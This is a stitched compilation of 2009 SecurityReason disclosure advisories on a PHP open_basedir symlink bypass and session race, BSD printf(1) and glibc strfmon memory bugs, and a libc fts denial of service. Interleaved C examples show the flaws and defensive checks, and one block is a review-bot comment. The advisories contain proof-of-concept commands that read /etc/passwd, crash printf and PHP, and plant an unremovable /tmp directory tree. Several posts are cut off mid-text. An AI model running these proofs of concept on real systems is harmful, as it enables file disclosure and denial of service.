features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

symlink - Creates a symbolic link

bool symlink ( string $target , string $link )

- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exists in the security model based on symlinks
and open_basedir. Paths like $target and $link are checked by
open_basedir. We can bypass open_basedir, but the function symlink()
itself is not affected. The issue is generated by a false security
model designed by PHP.

example:
127# cat sym.php

127# php sym.php
PHP Warning:  symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let`s see:
127# ls -la
total 8
drwxr-xr-x   2 www  www   512 Oct 20 00:33 .
drwxr-xr-x  13 www  www  1536 Oct 20 00:26 ..
- -rw-r--r--   1 www  www   356 Oct 20 00:32 kakao.php
- -rw-r--r--   1 www  www    45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php


127# php kakao.php
127# ls -la
total 12
drwxr-xr-x   4 www   www   512 Oct 20 00:37 .
drwxr-xr-x  13 www   www  1536 Oct 20 00:26 ..
drwxr-xr-x   4 www   www   512 Oct 20 00:37 abc
lrwxr-xr-x   1 www   www    27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
- -rw-r--r--   1 www   www   356 Oct 20 00:32 kakao.php
- -rw-r--r--   1 www   www    45 Oct 20 00:26 sym.php
drwxr-xr-x   2 www   www   512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

Now "tmplink" is a directory, so the link "exploit" resolves to
"../../etc/passwd". We don't need to bypass open_basedir; it is a design
mistake. PHP will allow "tmplink/../../../etc/passwd" because
./tmplink/../../../etc/passwd really exists.
So if we want to read another file, we need to create another structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm that tmplink/../../../usr/pkg/etc/php.ini really exists.
Very important is removing the fake link "tmplink" and creating, in the
same place, a directory with the same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here, because "tmplink" (the directory) is only 1
level deep, not 4.

Under PHP 5.2.11 we can also bypass safe_mode. However, protections such
as running PHP via suphp with the privileges of the users also have
their drawbacks.

We can use our exploit to show this vulnerability. If httpd allows
reading the link (default), we can create a symlink to / (of course if
we have access). If we cannot read the symlink, we can use the next PHP
flaw, "hazard syphon", to read other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

file /www/test/notyetexists doesn`t exist (current)

script1 "/www/test/sessrun.php"


now we have 60 sec to run script2

script2 "/www/test/runin60.php":



A hazard exists in PHP!

Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where the first phase (SAPI) will check privileges for
/www/test/notyetexists. But this file or dir doesn't exist, so
open_basedir will return false.
2. Script1 will sleep with a 60 sec delay. At this moment we need to run
script2. This script will create the link /www/test/notyetexists to /tmp
or other directories.
3. Script1, after 60 sec, will run the session_start() function, where
privileges for /www/test/notyetexists aren't checked at this moment.

As a result, we can use the function sleep() to create a fake delay, and
the first issue can help to create symlinks.

- --- 2. Exploit ---

open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard analogy, as in this note

- --- 3. Fix ---
Fix not available

- --- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securi
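
The directory-for-symlink swap from section 1, and the check-then-use window behind the session.save_path "hazard", as an added example that is not code from the advisory or from PHP: a C program that builds the same layout on a scratch tree, runs a realpath()-based prefix check of the kind open_basedir performs, swaps "tmplink" from a symlink to a plain directory of the same name, and runs the check again on the unchanged link "exploit". Every path in it is an assumption (a base directory under /tmp from mkdtemp(), base/www/test as the allowed directory, base/secret.txt as the file outside it); within_basedir(), symlink_swap_demo() and check_flips() are this example's own functions.

```c
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The check in spirit: resolve every component, then require the allowed
 * directory as a path prefix. 1 = inside, 0 = outside, -1 = unresolvable. */
int within_basedir(const char *path, const char *basedir)
{
    char real[PATH_MAX];
    if (realpath(path, real) == NULL) return -1;   /* every component must exist */
    size_t n = strlen(basedir);
    return strncmp(real, basedir, n) == 0 && (real[n] == '/' || real[n] == '\0');
}

static int touch(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Builds the tree under a fresh mkdtemp() directory, runs the check before
 * and after the swap (verdicts in *before / *after) and returns 0, or -1 if
 * setup failed. The scratch tree is left in place for inspection. */
int symlink_swap_demo(int *before, int *after)
{
    char base[] = "/tmp/obdXXXXXX";
    if (mkdtemp(base) == NULL) return -1;
    char test[PATH_MAX], allowed[PATH_MAX], p[PATH_MAX], tl[PATH_MAX], ex[PATH_MAX];

    snprintf(p, sizeof p, "%s/www", base);            if (mkdir(p, 0755)) return -1;
    snprintf(test, sizeof test, "%s/www/test", base);  if (mkdir(test, 0755)) return -1;
    if (realpath(test, allowed) == NULL) return -1;    /* canonical allowed prefix */

    /* the real target outside, and a decoy inside so the first check resolves */
    snprintf(p, sizeof p, "%s/secret.txt", base);  if (touch(p, "outside\n")) return -1;
    snprintf(p, sizeof p, "%s/secret.txt", test);  if (touch(p, "decoy\n")) return -1;

    /* abc/d1/d2 sits three levels below test; tmplink -> abc/d1/d2 for now */
    snprintf(p, sizeof p, "%s/abc", test);         if (mkdir(p, 0755)) return -1;
    snprintf(p, sizeof p, "%s/abc/d1", test);      if (mkdir(p, 0755)) return -1;
    snprintf(p, sizeof p, "%s/abc/d1/d2", test);   if (mkdir(p, 0755)) return -1;
    snprintf(tl, sizeof tl, "%s/tmplink", test);
    if (symlink("abc/d1/d2", tl)) return -1;

    /* the link read later: three ".." up from wherever tmplink leads */
    snprintf(ex, sizeof ex, "%s/exploit", test);
    if (symlink("tmplink/../../../secret.txt", ex)) return -1;

    *before = within_basedir(ex, allowed);   /* resolves to test/secret.txt */

    /* attacker's move after the check: same name, now a plain directory */
    if (unlink(tl) || mkdir(tl, 0755)) return -1;

    *after = within_basedir(ex, allowed);    /* resolves to base/secret.txt */
    return 0;
}

/* 1 when the check passes before the swap and fails after it, 0 otherwise,
 * -1 on setup failure. */
int check_flips(void)
{
    int before = -1, after = -1;
    if (symlink_swap_demo(&before, &after) != 0) return -1;
    return before == 1 && after == 0;
}

int main(void)
{
    int before = -1, after = -1;
    if (symlink_swap_demo(&before, &after) != 0) { perror("setup"); return 1; }
    printf("check before swap: %s\ncheck after swap:  %s\n",
           before == 1 ? "inside open_basedir" : "outside",
           after == 1 ? "inside open_basedir" : "outside");
    return 0;
}
```

The link text never changes; only what "tmplink" is changes, so a check that resolves the path once, at symlink() time or at the start of a request, says nothing about what the same path will resolve to when it is finally opened.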

[Full-disclosure] SecurityReason: Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities

2009-10-30 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 29.06.2009
- - Pub.: 30.10.2009

We are going to inform all vendors about this problem.

Affected Software (official):
- - OpenBSD 4.6
- - NetBSD 5.0.1
probably more (macosx, chrome, firefox,..)...

Original URL:
http://securityreason.com/achievement_securityalert/69

- --- 0.Description ---
printf(1) formats and prints its arguments, after the first, under control
of the format.  The format is a character string which contains three
types of objects: plain characters, which are simply copied to standard
output, character escape sequences which are converted and copied to the
standard output, and format specifications, each of which causes printing
of the next successive argument.

SYNOPSIS

 printf format [arguments ...]


The printf(3) family of functions produces output according to a format as
described below.  The printf(3) and vprintf(3) functions write output to
stdout, the standard output stream; fprintf(3) and vfprintf(3) write output
to the given output stream; sprintf(3), snprintf(3), vsprintf(3), and
vsnprintf(3) write to the character string str; and asprintf(3) and
vasprintf(3) write to a dynamically allocated string that is stored in ret.

SYNOPSIS

 int
 printf(const char * restrict format, ...);

- --- 1. Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ---
The first problem exists in usr.bin/printf/printf.c. printf(1) in NetBSD
and OpenBSD has a problem with the field width and precision. The
difference between printf(1) and printf(3) is that printf(1) has its own
filter for formatting fmt. To see the acceptable tags, use the manual
"man 1 printf".

We can use the char '*' in fmt to declare the size in the next arg.

example:
# printf %1.*f 1 1.2345
1.2

So, printf allows the use of "*" in fmt.

- ---
...
fieldwidth = *fmt == '*' ? getint() : 0;
...
- ---

The problem is that the program does not verify the accuracy of fmt.

It is possible to use '*' a few times
=>
the function getint() will be started a few times.

getint() returns the value allocated in memory (function printf(3)).

example:
# printf %1.**f 1 1.2345
/* long exec. */

The precision here will be taken from the stack. This means that the
precision is the number retrieved from the stack. Further addition of
the '*' char will move the pointer of the precision.

As a result, we try to appoint an offset to control the esi and edi
registers. But to do this, we need to change the fmt type from float to
string.

example (string):
# printf %*s 666
Memory fault (core dumped)

and we are at home. We need to add "*" to try to control the esi and edi
registers.

# gdb -q printf
(no debugging symbols found)
(gdb) r "%*s" 666
Starting program: /usr/bin/printf "%*s" 666
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xbbba6a2a in __vfprintf_unlocked () from /usr/lib/libc.so.12
(gdb) i r
eax            0x0        0
ecx            0xffffffff -1
edx            0x0        0
ebx            0xbbbd5b38 -1145218248
esp            0xbfbfe320 0xbfbfe320
ebp            0xbfbfec08 0xbfbfec08
esi            0x29a      666
edi            0x29a      666

esi and edi are 666 (NetBSD)

under OpenBSD we have randomization, so it will not be so easy.

- ---
727 size = p ? (p - cp) : prec;
728 } else {
729 size_t len;
730
731 if ((len = strlen(cp)) > INT_MAX)
732 goto overflow;
733 size = (int)len;
734 }
735 sign = '\0';
- ---

The program will crash at line 731 (strlen(cp)).

The variable "cp" will be allocated at address 666 in memory. So we can
try to manipulate the address of the "cp" variable. That means that the
shells are also affected (like /bin/sh, /bin/csh) because printf is also
used as a shell built-in. We do not have accurate information on who
uses a flawed implementation.

printf(1) should use the "IEEE 1003.1-2001" standard.

The next problem with printf(3) is very similar to "Multiple Vendors
libc/gdtoa printf(3) Array Overrun" (SREASONRES:20090625) and concerns
the implementation of gdtoa. We can try to allocate a lot of memory, so
that malloc will generate a crash. The issue has been detected in gdtoa
from OpenBSD. The NetBSD fix for (SREASONRES:20090625) is not affected
and we think that it is better. A discrepancy in theory divided NetBSD
and OpenBSD.

example:
# printf %.11f 1.1
Segmentation fault (core dumped)
...
(gdb) bt
#0  __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:75
#1  0x
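
The stray-'*' problem from section 1, as an added example that is not code from NetBSD's or OpenBSD's printf.c: a front end that expands every '*' in a printf(1)-style format from the argument list itself and rejects a second '*' ("%1.**f"), a '*' after digits, or a missing argument, so the format later handed to printf(3) never contains a '*' that would pull a width, a precision or, one conversion later, a string pointer off the va_list. expand_stars(), take_number() and arg_to_int() are this example's own names, the conversion list is the POSIX printf(1) set, and the BSD fixes themselves are not reproduced here.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Convert one argument to an int, the way getint() in printf(1) is meant
 * to. NULL (no argument left) is refused instead of reading something else. */
static int arg_to_int(const char *s, int *out)
{
    if (s == NULL) return -1;
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || end == s || *end != '\0' || v < INT_MIN || v > INT_MAX) return -1;
    *out = (int)v;
    return 0;
}

/* Read a width or precision at *pp: a run of digits, or a single '*' whose
 * value comes from args[*used]. Writes the decimal text to buf and returns
 * its length (0 = nothing to emit), or -1 on a missing/invalid argument or
 * a second '*' as in "%1.**f". With is_precision, a negative value means
 * "omitted", as POSIX specifies. */
static int take_number(const char **pp, char **args, int nargs, int *used,
                       char *buf, size_t buflen, int is_precision)
{
    const char *p = *pp;
    int n = 0;
    if (*p == '*') {
        int v;
        if (*used >= nargs || arg_to_int(args[*used], &v) != 0) return -1;
        (*used)++;
        p++;
        if (*p == '*') return -1;                 /* second star: reject */
        if (!(is_precision && v < 0)) n = snprintf(buf, buflen, "%d", v);
    } else {
        while (*p >= '0' && *p <= '9') {
            if (n + 1 >= (int)buflen) return -1;  /* absurd field size */
            buf[n++] = *p++;
        }
        buf[n] = '\0';
    }
    *pp = p;
    return n;
}

/* Rewrite fmt into out with every '*' resolved. Returns how many arguments
 * were consumed for widths/precisions, or -1 on error; the caller then
 * supplies the conversions from args[used..] and treats a missing one as
 * "" or 0 (POSIX printf(1) behaviour), never as whatever sits on the stack. */
int expand_stars(const char *fmt, char **args, int nargs, char *out, size_t outlen)
{
    size_t o = 0;
    int used = 0, n;
    char num[16];
    if (outlen == 0) return -1;
#define PUT(c) do { if (o + 1 >= outlen) return -1; out[o++] = (c); } while (0)
    const char *p = fmt;
    while (*p) {
        if (*p != '%') { PUT(*p++); continue; }
        PUT(*p++);
        if (*p == '%') { PUT(*p++); continue; }             /* "%%" */
        while (*p && strchr("-+ #0", *p)) PUT(*p++);        /* flags */
        n = take_number(&p, args, nargs, &used, num, sizeof num, 0);   /* width */
        if (n < 0 || *p == '*') return -1;                  /* "%1*": star after digits */
        for (int i = 0; i < n; i++) PUT(num[i]);
        if (*p == '.') {                                    /* precision */
            p++;
            int star = (*p == '*');
            n = take_number(&p, args, nargs, &used, num, sizeof num, 1);
            if (n < 0 || *p == '*') return -1;
            if (n > 0 || !star) {                           /* keep "%.f"; drop a negative */
                PUT('.');
                for (int i = 0; i < n; i++) PUT(num[i]);
            }
        }
        if (*p == '\0' || strchr("diouxXfFeEgGaAcsb", *p) == NULL) return -1;
        PUT(*p++);                                          /* conversion character */
    }
#undef PUT
    out[o] = '\0';
    return used;
}

int main(int argc, char **argv)
{
    char out[128];
    if (argc < 2) { fprintf(stderr, "usage: %s format [args...]\n", argv[0]); return 2; }
    int used = expand_stars(argv[1], argv + 2, argc - 2, out, sizeof out);
    if (used < 0) { fprintf(stderr, "rejected format: %s\n", argv[1]); return 1; }
    printf("format for printf(3): %s (%d argument(s) consumed, %d left)\n",
           out, used, argc - 2 - used);
    return 0;
}
```

For "%*s" with the single argument 666, expand_stars() consumes 666 as the width and reports that nothing is left for the %s, so the caller prints "" rather than the pointer printf(3) would otherwise have read next; "%1.**f" is refused outright.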

[Full-disclosure] libc:fts_*() Multiple Denial of Service

2009-10-02 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[libc:fts_*() Multiple Denial of Service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 03.08.2009
- - Pub.: 02.10.2009

We are going to inform all vendors about this problem.

Affected Software (official):
- - OpenBSD 4.5 (fix available)
- - NetBSD 5.0.1 (fix available)

probably more...

Original URL:
http://securityreason.com/achievement_securityalert/68

- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies. The
fts_open() function returns a "handle" on a file hierarchy, which is then
supplied to the other fts functions. The function fts_read() returns a
pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of
structures, each of which describes one of the files contained in a
directory within the hierarchy.

typedef struct _ftsent {
    unsigned short fts_info;      /* flags for FTSENT structure */
    char *fts_accpath;            /* access path */
    char *fts_path;               /* root path */
    size_t fts_pathlen;           /* strlen(fts_path) */
    char *fts_name;               /* file name */
    size_t fts_namelen;           /* strlen(fts_name) */
    short fts_level;              /* depth (-1 to N) */
    int fts_errno;                /* file errno */
    long fts_number;              /* local numeric value */
    void *fts_pointer;            /* local address value */
    struct _ftsent *fts_parent;   /* parent directory */
    struct _ftsent *fts_link;     /* next file structure */
    struct _ftsent *fts_cycle;    /* cycle structure */
    struct stat *fts_statp;       /* stat(2) information */
} FTSENT;

- --- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we reported an issue (SREASONRES:20090304) in libc (fts.c).
Now we want to present the conclusions and show the usefulness of this
vulnerability. The fix provided by the OpenBSD Team will protect us from
a crash but, we think, not in all cases shown in this advisory.

Index: fts.c
===
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 - 1.41
+++ fts.c 10 Feb 2009 09:00:24 -
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;

+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;

/* Read the directory, attaching each entry to the `link' pointer. */
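
Review bot: the new block makes an over-deep directory fatal for the whole traversal rather than for that directory alone. SET(FTS_STOP) means the next fts_read() returns NULL, so a caller such as rm -rf or find never reaches the entries after the offending one, which is the cleanup failure this advisory goes on to demonstrate with cleartmp. Consider reporting only this directory, keeping cur->fts_info = FTS_ERR; and return (NULL); but dropping SET(FTS_STOP);, the same way a directory that cannot be opened is handed back as FTS_DNR, so the walk continues with the next sibling and only the deep subtree is left behind.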

So let's see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script uses rm(1)
with the -rf args.

Lines 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)


Here the daemon will come to tmp_dir (/tmp) and wants to clean it with
the sequence "[a-km-pr-zA-Z]*". It will kill this script whenever it is
started. So if we create directory "A" in /tmp, all other files and
directories after it in alphabetical order will not be deleted.

Proof of Concept:
User cxib, have created exploit in main /tmp dir.

exploit:
127# cd /tmp && perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }'

In /tmp we have

# ls -la
total 22
drwxrwxrwt  10 root  wheel   512 Aug 11 01:18 .
drwxr-xr-x  27 root  wheel  1024 Aug 11 00:09 ..
drwxrwxrwx   2 root  wheel   512 Aug 11 00:49 .ICE-unix
- -r--r--r--   1 root  wheel    11 Aug 11 00:11 .X0-lock
drwxrwxrwt   2 root  wheel   512 Aug 11 00:11 .X11-unix
- -rw-r--r--   1 root  wheel     0 Aug 11 01:18 A
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 B
drwxr-xr-x   3 cxib  wheel   512 Aug  6 01:43 CC
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 D
- -rw-r--r--   1 root  wheel     0 Aug 11 01:16 chujwamwmuzg
drwx------   2 root  wheel   512 Aug 11 00:49 kde-root
drwx------   3 root  wheel   512 Aug 11 01:14 ksocket-root
drwx------   2 root  wheel   512 Aug 11 00:11 mc-root

Correct behavior will delete all files after reboot. So let's do it.

# reboot

Now we have in /tmp

# ls -la
total 18
drwxrwxrwt   9 root  wheel   512 Aug 11 13:57 .
drwxr-xr-x  27 root  wheel  1024 Aug 11 14:02 ..
drwxrwxrwx   2 root  wheel   512 Aug 11 00:49 .ICE-unix
drwxrwxrwt   2 root  wheel   512 Aug 11 01:19 .X11-unix
drwxr-xr-x   3 cxib  wheel   512 Aug  6 01:43 CC
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 D
- -rw-r--r--   1 root  wheel     0 Aug 11 01:16 chujwamwmuzg
drwx------   2 root  wheel   512 Aug 11 00:49 kde-root
drwx------   3 root  wheel   512 Aug 11 01:19 ksocket-root
drwx------   2 root  wheel   512 Aug 11 00:11 mc-root


File A and dir B have been deleted. But the file chujwamwmuzg and the
directories {D,Cx22} are still available. To resolve this, we can use the
OpenBSD fix. However, this does not fully resolve the problem. The user
can create a directory (like Cx22) that cannot be removed by rm(1).

To remove the Cx22 folder, we can use a program made by OpenBSD

- ---
#i
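
The cleanup failure shown above (one user-created entry stopping rm(1) or find(1), so everything sorted after it survives), as an added example that is not code from NetBSD's cleartmp, rm or fts: a C cleaner that runs a separate fts(3) walk per top-level entry, carries its own depth guard so an over-deep chain is refused for that entry only, and keeps going with the next entry whatever happened to the previous one. remove_entry(), clean_dir(), count_entries() and demo() are this example's own names, the guard values are assumptions, and demo() builds and then removes its scratch tree under /tmp with mkdtemp().

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fts.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove one top-level entry (file or tree). Returns 0 on success, -1 if
 * anything was left behind; it never aborts the caller's loop. Entries
 * deeper than max_depth are skipped, so their ancestors stay (non-empty)
 * and are reported, instead of the walk running until fts_level wraps. */
int remove_entry(const char *path, int max_depth)
{
    char *const argv[] = { (char *)path, NULL };
    /* FTS_PHYSICAL: never follow a symlink out of the tree being cleaned */
    FTS *fts = fts_open(argv, FTS_PHYSICAL | FTS_NOCHDIR, NULL);
    if (fts == NULL) return -1;
    int rc = 0;
    FTSENT *e;
    errno = 0;
    while ((e = fts_read(fts)) != NULL) {
        if (e->fts_level > max_depth) {        /* our own guard, per entry */
            fts_set(fts, e, FTS_SKIP);
            rc = -1;
        } else switch (e->fts_info) {
        case FTS_D:   break;                   /* pre-order: children first */
        case FTS_DP:  if (rmdir(e->fts_accpath) != 0) rc = -1; break;
        case FTS_DNR: case FTS_ERR: case FTS_NS:
                      rc = -1; break;          /* unreadable, or walk stopped */
        default:      if (unlink(e->fts_accpath) != 0) rc = -1; break;
        }
        errno = 0;
    }
    if (errno != 0) rc = -1;                   /* fts_read() itself failed */
    fts_close(fts);
    return rc;
}

static int count_entries(const char *dir)
{
    DIR *d = opendir(dir);
    if (d == NULL) return -1;
    int n = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL)
        if (strcmp(de->d_name, ".") != 0 && strcmp(de->d_name, "..") != 0) n++;
    closedir(d);
    return n;
}

/* Clean every entry directly under dir, isolating failures. Returns how
 * many entries could not be removed (0 = clean), -1 if dir is unreadable. */
int clean_dir(const char *dir, int max_depth)
{
    DIR *d = opendir(dir);
    if (d == NULL) return -1;
    int failed = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0) continue;
        char path[PATH_MAX];
        snprintf(path, sizeof path, "%s/%s", dir, de->d_name);
        if (remove_entry(path, max_depth) != 0) failed++;   /* note it, move on */
    }
    closedir(d);
    return failed;
}

/* Scratch tree: file A, dir B with a file, empty dir D, and a hostile chain
 * CC/CC/... six levels deep against a guard of three. Returns how many
 * entries survive the guarded cleaner (expected 1: the chain), -1 on
 * setup trouble. The tree is removed afterwards with a generous guard. */
int demo(void)
{
    char base[] = "/tmp/cleanXXXXXX";
    if (mkdtemp(base) == NULL) return -1;
    char p[PATH_MAX];
    FILE *f;
    snprintf(p, sizeof p, "%s/A", base);   if ((f = fopen(p, "w")) == NULL) return -1; fclose(f);
    snprintf(p, sizeof p, "%s/B", base);   if (mkdir(p, 0755)) return -1;
    snprintf(p, sizeof p, "%s/B/x", base); if ((f = fopen(p, "w")) == NULL) return -1; fclose(f);
    snprintf(p, sizeof p, "%s/D", base);   if (mkdir(p, 0755)) return -1;
    snprintf(p, sizeof p, "%s/CC", base);
    for (int i = 0; i < 6; i++) { if (mkdir(p, 0755)) return -1; strcat(p, "/CC"); }

    int failed = clean_dir(base, 3);
    int left = count_entries(base);

    snprintf(p, sizeof p, "%s/CC", base);
    remove_entry(p, 1000);
    rmdir(base);
    return failed == 1 ? left : -1;
}

int main(void)
{
    int left = demo();
    printf("entries left after guarded cleanup: %d (expected 1: the deep chain)\n", left);
    return left == 1 ? 0 : 1;
}
```

Whether the directory order puts the hostile entry first or last makes no difference here: A, B and D are removed in every case, and only the chain itself survives, which is what the single find/rm invocation in cleartmp cannot guarantee once one fts walk stops.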

[Full-disclosure] SecurityReason: glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities

2009-09-17 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.03.2008
- - Pub.: 17.09.2009

CVE: CVE-2008-1391
Risk: High

Affected Software (tested 27.08.2009):
- - Fedora 11
- - Slackware 12.2
- - Ubuntu 9.04
- - others linux distributions

Original URL:
http://securityreason.com/achievement_securityalert/67

Previous URL:
http://securityreason.com/achievement_securityalert/53

- --- 0.Description ---
strfmon -- convert monetary value to string

The strfmon() function places characters into the array pointed to by s as
controlled by the string pointed to by format. No more than maxsize bytes
are placed into the array.

The format string is composed of zero or more directives: ordinary
characters (not %), which are copied unchanged to the output stream; and
conversion specifications, each of which results in fetching zero or more
subsequent arguments. Each conversion specification is introduced by the %
character.

SYNOPSIS:

#include <monetary.h>

ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict format,
...);

- --- 1. glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ---
In March 2008, our team published a security note (SREASONRES:20080325)
about vulnerabilities in the strfmon(3) function. The issue was
officially diagnosed in NetBSD, FreeBSD and MacOSX. However, judging
from the source code, glibc is also vulnerable. We informed the glibc
team. However, the description of the issue and the fix were not enough
for the GNU team. They changed the status to BOGUS and the response was:

- ---
And what exactly does an BSD implementation has to do with glibc?
- ---

Today we know that only NetBSD is secure against this, and all systems
using glibc are affected. Despite the differences between the NetBSD
libc and glibc code, the issue is the same, but the exploit differs from
the one presented in (SREASONRES:20080325).

Description of the vulnerability:
http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325)
http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/

Description of the fix:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc

To present this issue on Fedora 11, we will use the PHP client.
money_format() uses the strfmon(3) function, so this program will be
perfect.

[...@localhost ~]$ php -r 'money_format("%.1073741821i",1);'
Segmentation fault

for 'money_format("%.1073741821i",1);' we will get

Program received signal SIGSEGV, Segmentation fault.
0x0019331a in __printf_fp () from /lib/libc.so.6

(gdb) bt
#0  0x0019331a in __printf_fp () from /lib/libc.so.6
#1  0x0018832b in __vstrfmon_l () from /lib/libc.so.6
#2  0x00187a36 in strfmon () from /lib/libc.so.6

strfmon() will call __printf_fp() with an overflowed arg. As a result

(gdb) x/20s ($esi)-10
0x8448ff6:   ""
0x8448ff7:   ""
0x8448ff8:   "0"
0x8448ffa:   ""
0x8448ffb:   ""
0x8448ffc:   "0"
0x8448ffe:   ""
0x8448fff:   ""
0x8449000:   
0x8449000:   
0x8449000:   
...
(gdb) i r
eax            0x30       48
ecx            0x0        0
edx            0x0        0
ebx            0x2bdff4   2875380
esp            0xbfffec14 0xbfffec14
ebp            0xbfffed78 0xbfffed78
esi            0x8449000  138711040
edi            0x810c     33036
eip            0x19331a   0x19331a <__printf_fp+3274>

Now let's see what will happen for 'money_format("%.1073741822i",1);'

Program received signal SIGSEGV, Segmentation fault.
0x0034b27b in hack_digit.12295 () from /lib/libc.so.6

php will crash in hack_digit().

(gdb) i r
eax            0x3ffffffe 1073741822
ecx            0x32       50
edx            0x2        2
ebx            0x476ff4   4681716
esp            0xbfffebc4 0xbfffebc4
ebp            0xbfffebf4 0xbfffebf4
esi            0x32       50
edi            0x3e       62

we can try to change the edi register.

For 'money_format("%.1073741824i",1);'
(gdb) i r
eax            0x40000000 1073741824
ecx            0x32       50
edx            0x2        2
ebx            0x35bff4   3522548
esp            0xbfffebbc 0xbfffebbc
ebp            0xbfffebec 0xbfffebec
esi            0x32       50
edi            0x42       66


But let's see what will happen for
'money_format("%.77715949976712904702i", 1.1);'

crash in
Program received signal SIGSEGV, Segmentation fault.
0x00e4327b in hack_digit.12295 () from /lib/libc.so.6
(gdb) i r
eax            0x3ffffffe 1073741822
ecx            0x34       52
edx            0x2        2
ebx            0xf6eff4   16183284
esp            0xbfffebb4 0xbfffebb4
ebp            0xbfffebe4 0xbfffebe4
esi            0x34       52
edi            0x3e       62

esi 52.

In
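
The call-site check a practitioner wants in front of strfmon(3) while libc is unpatched, as an added example that is not glibc, NetBSD or PHP code: it parses the width, left precision (#n) and right precision (.p) of every conversion in a strfmon format, refuses anything above a fixed bound or anything that does not fit in an int, and only then calls strfmon(), so a format such as "%.1073741821i" is rejected before __printf_fp() ever sees it. The bound MAX_FIELD and the names read_num(), strfmon_format_ok() and safe_strfmon() are this example's own; the NetBSD fix itself is not reproduced.

```c
#include <errno.h>
#include <limits.h>
#include <locale.h>
#include <monetary.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define MAX_FIELD 1000   /* far beyond any real monetary field (assumption) */

/* Read a decimal number at *pp into *out with overflow detection; an empty
 * number yields 0. Returns 0, or -1 if it would not fit in an int. The
 * check runs after every digit, so the accumulator itself never overflows. */
static int read_num(const char **pp, int *out)
{
    long long v = 0;
    const char *p = *pp;
    while (*p >= '0' && *p <= '9') {
        v = v * 10 + (*p - '0');
        if (v > INT_MAX) return -1;
        p++;
    }
    *pp = p;
    *out = (int)v;
    return 0;
}

/* strfmon spec: %[flags][width][#left][.right](i|n), or %%. Returns 0 if
 * every field stays within MAX_FIELD, -1 for an oversized field, an
 * overflowing number or an unknown conversion. */
int strfmon_format_ok(const char *fmt)
{
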